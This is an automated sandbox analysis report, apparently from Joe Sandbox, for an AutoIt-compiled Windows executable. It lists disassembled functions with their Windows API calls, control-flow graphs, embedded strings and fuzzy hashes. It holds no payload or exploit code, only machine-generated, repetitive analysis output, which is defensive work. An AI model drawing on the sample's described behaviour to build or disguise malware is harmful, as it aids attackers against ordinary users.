                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%}
                    • API String ID: 529118366-2264255860
                    • Opcode ID: 7e14835cfcdcfc2e7a579936f11daaff6aec676524e7ae8ea389f43f6ca27455
                    • Instruction ID: 69d935ed5902447540f3962d049f6843374522d46ce3bf065d72ec20f2baea18
                    • Opcode Fuzzy Hash: 7e14835cfcdcfc2e7a579936f11daaff6aec676524e7ae8ea389f43f6ca27455
                    • Instruction Fuzzy Hash: 93510430E04289EBCF15ABB4DC49EFD7B79BF05340B008179F559A22A1EB7C5A25CB21

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 943 744fe9-745001 CreateStreamOnHGlobal 944 745021-745026 943->944 945 745003-74501a FindResourceExW 943->945 946 745020 945->946 947 77dd5c-77dd6b LoadResource 945->947 946->944 947->946 948 77dd71-77dd7f SizeofResource 947->948 948->946 949 77dd85-77dd90 LockResource 948->949 949->946 950 77dd96-77ddb4 949->950 950->946
                    APIs
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00744EEE,?,?,00000000,00000000), ref: 00744FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00744EEE,?,?,00000000,00000000), ref: 00745010
                    • LoadResource.KERNEL32(?,00000000,?,?,00744EEE,?,?,00000000,00000000,?,?,?,?,?,?,00744F8F), ref: 0077DD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00744EEE,?,?,00000000,00000000,?,?,?,?,?,?,00744F8F), ref: 0077DD75
                    • LockResource.KERNEL32(Nt,?,?,00744EEE,?,?,00000000,00000000,?,?,?,?,?,?,00744F8F,00000000), ref: 0077DD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$Nt
                    • API String ID: 3051347437-3041533753
                    • Opcode ID: a465296f4f838737b42d08246db205527937550fd0ddf5496c9c9d9ca3dd0d50
                    • Instruction ID: 13358ad012285b9a18625587f3c002d5d12231de47802a5a939374fd36c2776f
                    • Opcode Fuzzy Hash: a465296f4f838737b42d08246db205527937550fd0ddf5496c9c9d9ca3dd0d50
                    • Instruction Fuzzy Hash: 16112A75240B01AFE7218B65DC58F6B7BBEEBC9B51F20816DF406D6260DB75EC008664

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1007 744afe-744b5e call 7477c7 GetVersionExW call 747d2c 1012 744b64 1007->1012 1013 744c69-744c6b 1007->1013 1015 744b67-744b6c 1012->1015 1014 77db90-77db9c 1013->1014 1018 77db9d-77dba1 1014->1018 1016 744c70-744c71 1015->1016 1017 744b72 1015->1017 1021 744b73-744baa call 747e8c call 747886 1016->1021 1017->1021 1019 77dba4-77dbb0 1018->1019 1020 77dba3 1018->1020 1019->1018 1022 77dbb2-77dbb7 1019->1022 1020->1019 1030 744bb0-744bb1 1021->1030 1031 77dc8d-77dc90 1021->1031 1022->1015 1024 77dbbd-77dbc4 1022->1024 1024->1014 1026 77dbc6 1024->1026 1029 77dbcb-77dbce 1026->1029 1032 77dbd4-77dbf2 1029->1032 1033 744bf1-744c08 GetCurrentProcess IsWow64Process 1029->1033 1030->1029 1034 744bb7-744bc2 1030->1034 1035 77dc92 1031->1035 1036 77dca9-77dcad 1031->1036 1032->1033 1037 77dbf8-77dbfe 1032->1037 1043 744c0d-744c1e 1033->1043 1044 744c0a 1033->1044 1038 77dc13-77dc19 1034->1038 1039 744bc8-744bca 1034->1039 1040 77dc95 1035->1040 1041 77dcaf-77dcb8 1036->1041 1042 77dc98-77dca1 1036->1042 1045 77dc00-77dc03 1037->1045 1046 77dc08-77dc0e 1037->1046 1049 77dc23-77dc29 1038->1049 1050 77dc1b-77dc1e 1038->1050 1047 744bd0-744bd3 1039->1047 1048 77dc2e-77dc3a 1039->1048 1040->1042 1041->1040 1051 77dcba-77dcbd 1041->1051 1042->1036 1052 744c20-744c30 call 744c95 1043->1052 1053 744c89-744c93 GetSystemInfo 1043->1053 1044->1043 1045->1033 1046->1033 1055 77dc5a-77dc5d 1047->1055 1056 744bd9-744be8 1047->1056 1058 77dc44-77dc4a 1048->1058 1059 77dc3c-77dc3f 1048->1059 1049->1033 1050->1033 1051->1042 1064 744c32-744c3f call 744c95 1052->1064 1065 744c7d-744c87 GetSystemInfo 1052->1065 1057 744c56-744c66 1053->1057 1055->1033 1061 77dc63-77dc78 1055->1061 1062 77dc4f-77dc55 1056->1062 1063 744bee 1056->1063 1058->1033 1059->1033 1066 77dc82-77dc88 1061->1066 1067 77dc7a-77dc7d 1061->1067 1062->1033 1063->1033 1072 744c76-744c7b 1064->1072 1073 744c41-744c45 GetNativeSystemInfo 1064->1073 1069 744c47-744c4b 1065->1069 1066->1033 1067->1033 1069->1057 1071 744c4d-744c50 FreeLibrary 1069->1071 1071->1057 1072->1073 1073->1069
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00744B2B
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                    • GetCurrentProcess.KERNEL32(?,007CFAEC,00000000,00000000,?), ref: 00744BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00744BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00744C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00744C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00744C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00744C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 7692c4378464b0da73273d14596bd70f1b142e92881fcc8f064ad8a21e5c46bd
                    • Instruction ID: 10cbe676721459d87373047ac4f01b39cd8d2ee8f05fed6a589c912b5bc8c416
                    • Opcode Fuzzy Hash: 7692c4378464b0da73273d14596bd70f1b142e92881fcc8f064ad8a21e5c46bd
                    • Instruction Fuzzy Hash: A291C67154A7C4DECB31CB6885956AAFFF5AF26300B488D5DD0CB93B01D328E908D769
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,0077E7C1), ref: 007A46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 007A46B7
                    • FindClose.KERNEL32(00000000), ref: 007A46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 826ef002c82c3186c61a5773c36f3134571f1e65e99faa18eb6f62bb40c9b456
                    • Instruction ID: f674ef6779db58b5a22e050b4bc9135988719a27f62537e112c555cac30f325c
                    • Opcode Fuzzy Hash: 826ef002c82c3186c61a5773c36f3134571f1e65e99faa18eb6f62bb40c9b456
                    • Instruction Fuzzy Hash: 22E0DF328118006B8610A738EC4D8EE779DAE87335F10472AF835C20E0EBF89960869A
                    Strings
                    • Variable must be of type 'Object'., xrefs: 0078428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: d8a9b1f8caf3c45a079d77954bc347254320c7a1b932f3b31e31f01803edadc9
                    • Instruction ID: 7469734d9d32ad52d56f014ded4ad606308c72f3a8163e17b294c749cd978ee0
                    • Opcode Fuzzy Hash: d8a9b1f8caf3c45a079d77954bc347254320c7a1b932f3b31e31f01803edadc9
                    • Instruction Fuzzy Hash: 8DA29F74E04216CFCB24DF58C484AAEB7B1FF58320F248169E916AB351D779ED82CB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00750BBB
                    • timeGetTime.WINMM ref: 00750E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00750FB3
                    • TranslateMessage.USER32(?), ref: 00750FC7
                    • DispatchMessageW.USER32(?), ref: 00750FD5
                    • Sleep.KERNEL32(0000000A), ref: 00750FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 0075105A
                    • DestroyWindow.USER32 ref: 00751066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00751080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 007852AD
                    • TranslateMessage.USER32(?), ref: 0078608A
                    • DispatchMessageW.USER32(?), ref: 00786098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007860AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: 5ffb83526ba4c04c519206f5d8d631215bfe1659abc3b6119272ec7ba1eac36f
                    • Instruction ID: cad893d6c8fc1e59ce021e52824f0c57b9cac84dcd2cd42d9cbe85846e4832de
                    • Opcode Fuzzy Hash: 5ffb83526ba4c04c519206f5d8d631215bfe1659abc3b6119272ec7ba1eac36f
                    • Instruction Fuzzy Hash: 77B2E770608741DFD724EF24C889BAAB7E5FF84304F14891DF98997291DB79E848CB92

                    Control-flow Graph

                    APIs
                      • Part of subcall function 007A91E9: __time64.LIBCMT ref: 007A91F3
                      • Part of subcall function 00745045: _fseek.LIBCMT ref: 0074505D
                    • __wsplitpath.LIBCMT ref: 007A94BE
                      • Part of subcall function 0076432E: __wsplitpath_helper.LIBCMT ref: 0076436E
                    • _wcscpy.LIBCMT ref: 007A94D1
                    • _wcscat.LIBCMT ref: 007A94E4
                    • __wsplitpath.LIBCMT ref: 007A9509
                    • _wcscat.LIBCMT ref: 007A951F
                    • _wcscat.LIBCMT ref: 007A9532
                      • Part of subcall function 007A922F: _memmove.LIBCMT ref: 007A9268
                      • Part of subcall function 007A922F: _memmove.LIBCMT ref: 007A9277
                    • _wcscmp.LIBCMT ref: 007A9479
                      • Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AAE
                      • Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007A96DC
                    • _wcsncpy.LIBCMT ref: 007A974F
                    • DeleteFileW.KERNEL32(?,?), ref: 007A9785
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007A979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: d8282636f698cf0f0b944991277a2a50e22ec828fe8eb820a99511ae3cb13238
                    • Instruction ID: 3760712d934381beccdf1a82930bb58255e7ad8761d5e00b161f3682e3ccd538
                    • Opcode Fuzzy Hash: d8282636f698cf0f0b944991277a2a50e22ec828fe8eb820a99511ae3cb13238
                    • Instruction Fuzzy Hash: 34C13CB1E00229ABCF21DFA5CC85EDEB7BDAF85300F0041AAF609E7151DB349A548F65

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00743074
                    • RegisterClassExW.USER32(00000030), ref: 0074309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007430AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 007430CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007430DC
                    • LoadIconW.USER32(000000A9), ref: 007430F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00743101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: e47f74b6de13e62510e318e4e62e55b8985d7797952bb7c0f114eb1840e8c7ae
                    • Instruction ID: 1beaa942d6e390566e02168e2e5c0b790b1e2e92c152b23420711b31abce1c3f
                    • Opcode Fuzzy Hash: e47f74b6de13e62510e318e4e62e55b8985d7797952bb7c0f114eb1840e8c7ae
                    • Instruction Fuzzy Hash: A4313AB1940305EFDB90DFA4DC48AC9BBF1FB09710F14852EE595E62A0E3B945A1CF94

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00743074
                    • RegisterClassExW.USER32(00000030), ref: 0074309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007430AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 007430CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007430DC
                    • LoadIconW.USER32(000000A9), ref: 007430F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00743101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 96e1e643aa9e6ae9ef7b71873f9f87a0c86174ff424079e5307076b81d739fba
                    • Instruction ID: 5c7c1010c55d7dafea66e2635c728a47ff93acfa15e8ec9573738d5b64115926
                    • Opcode Fuzzy Hash: 96e1e643aa9e6ae9ef7b71873f9f87a0c86174ff424079e5307076b81d739fba
                    • Instruction Fuzzy Hash: 3321C5B1901218AFDB40DFA4EC49B9DBBF5FB08710F00812AF911A62A0E7B545648F95

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00744864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008062F8,?,007437C0,?), ref: 00744882
                      • Part of subcall function 0076074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007472C5), ref: 00760771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00747308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0077ECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0077ED32
                    • RegCloseKey.ADVAPI32(?), ref: 0077ED70
                    • _wcscat.LIBCMT ref: 0077EDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: b19b49079832bd388b62f0da291e30c074080ae3fbb77272c6d6fecde6e89292
                    • Instruction ID: 601acce1e08bd66fb9229e4009eafc918a67e0134dcb6b4617f12f8dbfb17e2e
                    • Opcode Fuzzy Hash: b19b49079832bd388b62f0da291e30c074080ae3fbb77272c6d6fecde6e89292
                    • Instruction Fuzzy Hash: 8B719E71909301DEC754EF25DC8999BBBE8FF58740F80492EF44AC31A1EB74A949CBA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 761 743633-743681 763 7436e1-7436e3 761->763 764 743683-743686 761->764 763->764 767 7436e5 763->767 765 7436e7 764->765 766 743688-74368f 764->766 768 7436ed-7436f0 765->768 769 77d31c-77d34a call 7511d0 call 7511f3 765->769 770 743695-74369a 766->770 771 74375d-743765 PostQuitMessage 766->771 772 7436ca-7436d2 DefWindowProcW 767->772 773 743715-74373c SetTimer RegisterWindowMessageW 768->773 774 7436f2-7436f3 768->774 808 77d34f-77d356 769->808 775 7436a0-7436a2 770->775 776 77d38f-77d3a3 call 7a2a16 770->776 779 743711-743713 771->779 778 7436d8-7436de 772->778 773->779 782 74373e-743749 CreatePopupMenu 773->782 780 77d2bf-77d2c2 774->780 781 7436f9-74370c KillTimer call 7444cb call 743114 774->781 783 743767-743776 call 744531 775->783 784 7436a8-7436ad 775->784 776->779 801 77d3a9 776->801 779->778 787 77d2c4-77d2c6 780->787 788 77d2f8-77d317 MoveWindow 780->788 781->779 782->779 783->779 790 77d374-77d37b 784->790 791 7436b3-7436b8 784->791 795 77d2e7-77d2f3 SetFocus 787->795 796 77d2c8-77d2cb 787->796 788->779 790->772 798 77d381-77d38a call 79817e 790->798 799 7436be-7436c4 791->799 800 74374b-74375b call 7445df 791->800 795->779 796->799 804 77d2d1-77d2e2 call 7511d0 796->804 798->772 799->772 799->808 800->779 801->772 804->779 808->772 812 77d35c-77d36f call 7444cb call 7443db 808->812 812->772
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 007436D2
                    • KillTimer.USER32(?,00000001), ref: 007436FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0074372A
                    • CreatePopupMenu.USER32 ref: 0074373E
                    • PostQuitMessage.USER32(00000000), ref: 0074375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%}
                    • API String ID: 129472671-1720201399
                    • Opcode ID: 561bd638921a263494221b79defa82214786d0743d70c3e4e0d6cc0b34e1d754
                    • Instruction ID: 31b827dc88978adccff11bdd360be09fee2cb5b59b5ae15a0d589d7f49279d52
                    • Opcode Fuzzy Hash: 561bd638921a263494221b79defa82214786d0743d70c3e4e0d6cc0b34e1d754
                    • Instruction Fuzzy Hash: D04136B1200106FBDF645F68DC4DB793765FB00340F144129FA0ED62A2EB6CAE349766

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00743A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00743A71
                    • LoadIconW.USER32(00000063), ref: 00743A88
                    • LoadIconW.USER32(000000A4), ref: 00743A9A
                    • LoadIconW.USER32(000000A2), ref: 00743AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00743AD2
                    • RegisterClassExW.USER32(?), ref: 00743B28
                      • Part of subcall function 00743041: GetSysColorBrush.USER32(0000000F), ref: 00743074
                      • Part of subcall function 00743041: RegisterClassExW.USER32(00000030), ref: 0074309E
                      • Part of subcall function 00743041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007430AF
                      • Part of subcall function 00743041: InitCommonControlsEx.COMCTL32(?), ref: 007430CC
                      • Part of subcall function 00743041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007430DC
                      • Part of subcall function 00743041: LoadIconW.USER32(000000A9), ref: 007430F2
                      • Part of subcall function 00743041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00743101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
